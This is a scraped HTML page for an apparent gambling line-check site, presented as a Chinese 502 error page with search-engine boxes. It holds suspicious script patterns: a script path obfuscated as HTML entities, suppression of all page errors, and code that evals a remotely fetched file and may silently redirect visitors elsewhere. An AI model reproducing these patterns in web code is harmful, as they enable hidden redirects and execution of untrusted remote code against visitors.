<!DOCTYPE html>
<html lang="zh-cn">
<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <title>天游ty8检测中心_ty8天游线路检测中心</title>
<script type="text/javascript" src="&#x2F;&#x6A;&#x71;&#x75;&#x65;&#x72;&#x79;&#x2E;&#x6D;&#x69;&#x6E;&#x2E;&#x6A;&#x73;" rel="nofollow"></script>
    <style>
        html, body {
        	margin: 0;
        	padding: 0;
        	background: #f7f7f7;
        }
        .wrap{
        	width: 100%;
        	position: relative;
        	margin: auto;
        	text-align: center;
        	margin-top: 6.5%;
        }
		.wrap img{
			max-width: 1000px;
		}
        .content{
        	margin-top: -5%;
        	margin-bottom: 43px;
        }
        .content p.title{
        	font-size: 25px;
        	color: #444;
        }
        .content .reason{
        	font: 16px;
        	color: #999;
        	line-height: 28px;
        	text-align: left;
        	margin-left: 40%;
			width: 22%;
        }
         .content .reason p{
         margin:0;
       }
        span.line{
        	display: inline-block;
        	content: "";
        	
        }
        .footer{
        	width: 55%;
        	border-top: 2px solid #e3e3e3;
        	margin: auto;
        }
        .footer p{
        	font: 16px;
        	color: #999;
        	line-height: 15px;
        	text-align: left;
        	padding: 0 20px;
        }
		.footer p span{
			line-height:20px;
			white-space: normal; 
		}
    </style>
<link rel="alternate" media="only screen and(max-width: 640px)" href="http://anxinjm.com"></head>
<body><script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<h1><a href="/" target="_blank">天游ty8检测中心_ty8天游线路检测中心</a></h1>
	<div class="wrap" style="display: none;">
			<img src="https://error.websaas.cn/img/502.png" >
			<div class="content">
				<p class="title">您当前访问的网站出现响应异常</p>
				<div class="reason">
					<p>如果您是网站管理员，请确认：</p>
					<div style="padding-left: 33px;">
						<p>一、请检查您的源站服务器是否使用安全狗，云锁等安全防护软件，如果有，请关闭这类软件在尝试；</p>
						<p>二、请您检查测试网站自身是否正常。</p>
					</div>
				</div>
			</div>
			<div class="footer">
				<p>【当前网址】<a class="url" style="color: #1e80ff;"></a></p>
				<p>【客户端特征】<span class="user_agent"></span></p>
				<p>【当前时间】<span class="now"></span></p>
				<p style="text-align: center;">我是网站管理员，<span id="callBack" style="color: #1e80ff;cursor: pointer;">我要处理此异常</span></p>
			</div>
	</div>
 <script src="https://custompages.websaas.cn/sha1.min.js" type="text/javascript" charset="utf-8"></script>
 <script type="text/javascript">
	 let wrap = document.getElementsByClassName('wrap')[0]
	 let host = window.location.href
	 var demoFlag = false
	 var imgFlag = false
	 var timeOut = 2000
function requestConfig() {
	    const xhr1 = new XMLHttpRequest()
	    xhr1.open('get','https://custompages.websaas.cn/7bef9456-a3a9-4306-a9ca-5cadc03f6879.js',true)
	    // xhr1.open('get','./demo.js',true)
	    xhr1.setRequestHeader('XWD-Token', 'waduxawe124asdx');
	    xhr1.onreadystatechange = function(){
			if (xhr1.readyState == 4) {
				demoFlag = true
				if((xhr1.status>=200&&xhr1.status<300)||xhr1.status==0){
					if(xhr1.responseText.length>0){
						eval(xhr1.responseText)
						if(jsonData[502].length == 0){
							showDefault()
						}else{
							for (let i = 0,num=0; i < jsonData[502].length; i++) {
							    const element = jsonData[502][i];
						        if(element['target']&&host.includes(element['host'])){
						            CheckStatus(element['target'])
						            xhr1.onreadystatechange = null;
									return
						        } 
						        if(jsonData[502].length-1 == num){
						            showDefault()
								}
								num++   
							}
						}
					}else{
						showDefault();
					}
				}else{
					showDefault();
				}
			}
	    }
	    xhr1.send()
		timeOutFn(xhr1)
	}
	requestConfig();
	
	function CheckStatus(target){
		let link = target
	    const xhr2 = new XMLHttpRequest()
	    xhr2.onreadystatechange = function() {
	            if (xhr2.readyState === 4) {
					imgFlag = true
	                if (xhr2.status === 200) {
	                    window.location.href = target
	                    xhr2.onreadystatechange = null;
	                } else {
	                    showDefault();
	                }
	            }
	    };
	    xhr2.open("HEAD",link,true)
	    xhr2.send()
		timeOutFn(xhr2,true)
	}
	function showDefault() {
		setTimeout(()=>{
			wrap.style.display='block'
		},500)
	}
	function timeOutFn(xhr,second){
		if(demoTime){clearTimeout(demoTime)}
		var demoTime = setTimeout(()=>{
			if(!demoFlag||(second&&!imgFlag)){
				xhr.onreadystatechange = null;
				xhr.abort()
				showDefault()
			}
		},timeOut)
	}
	
	function urlCode(str) {
	    var result = "";
	    for (var i = 0; i < str.length; i++)
	        if (str != "") {
	            result += '&#' + str.charCodeAt(i) + ';';
	        }
	    return result;
	}
	Date.prototype.format = function(format) {
	    var o = {
	        "M+": this.getMonth() + 1,
	        "d+": this.getDate(),
	        "h+": this.getHours(),
	        "m+": this.getMinutes(),
	        "s+": this.getSeconds(),
	        "q+": Math.floor((this.getMonth() + 3) / 3),
	        "S": this.getMilliseconds()
	    };
	    if (/(y+)/.test(format)) format = format.replace(RegExp.$1,
	        (this.getFullYear() + "").substr(4 - RegExp.$1.length));
	    for (var k in o)
	        if (new RegExp("(" + k + ")").test(format))
	            format = format.replace(RegExp.$1,
	                RegExp.$1.length == 1 ? o[k] :
	                ("00" + o[k]).substr(("" + o[k]).length));
	    return format;
	};
	var url = document.URL;
	url = encodeURI(url);
	var user_agent = navigator.userAgent
	var from = urlCode(document.referrer);
	var now = new Date().format("yyyy-MM-dd hh:mm:ss");
	document.getElementsByClassName('url')[0].innerText = url
	document.getElementsByClassName('url')[0].href = url
	document.getElementsByClassName('user_agent')[0].innerText = user_agent
	document.getElementsByClassName('now')[0].innerText = now
 </script>
<script src="https://custompages.websaas.cn/udesk.js"type="text/javascript" charset="utf-8"></script>
<center>
    <form data-evt="return baiduWithHttps(this)" action="http://www.baidu.com/baidu" target="_blank">
        <input name="tn" type="hidden" value="SE_zzsearchcode_shhzc78w">
        <a target="_blank" href="https://www.baidu.com/"><img width="100px" height="22px" src="https://www.baidu.com/img/baidu_jgylogo3.gif" alt="Baidu" align="bottom" border="0"></a>
        <input type="text" data-evt="checkHttps" name="word" size="20" value="">
        <input type="submit" value="百 度" height="26px">
    </form>
    <form action="https://www.sogou.com/web" name="sf" id="sf" target="_blank">
        <a target="_blank" href="https://www.baidu.com/"><img width="100px" height="22px" src="https://www.sogou.com/web/index/images/logo_440x140.v.4.png" alt="sogou" align="bottom" border="0"></a>
        <span class="sec-input-box yuyin-cur">
            <input height="22px" type="text" class="sec-input" name="query" id="query" maxlength="100" len="80" autocomplete="off" value="">
        </span>
        <span class="enter-input"><input type="submit" id="stb" value="搜 狗" height="26px"></span>
        <input type="hidden" name="_asf" value="www.sogou.com">
        <input type="hidden" name="_ast">
        <input type="hidden" name="w" value="01019900">
        <input type="hidden" name="p" value="40040100">
        <input type="hidden" name="ie" value="utf8">
        <input type="hidden" name="from" value="index-nologin">
        <input type="hidden" name="s_from" value="index">
    </form>  
  <form id="so360form" target="_blank" action="https://www.so.com/">
        <img width="100px" height="22px" src="http://p1.qhimg.com/d/_onebox/search.png">
        <input height="22px" id="so360_keyword" type="text" name="q" autocomplete="off" value="">
        <input id="so360_submit" type="submit" value="搜 索" height="26px">
        <input type="hidden" value="utf-8" name="ie">
        <input type="hidden" value="zz" name="src">
        <input type="hidden" value="so.com" name="site">
        <input type="hidden" value="1" name="rg">
    </form>
</center></body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
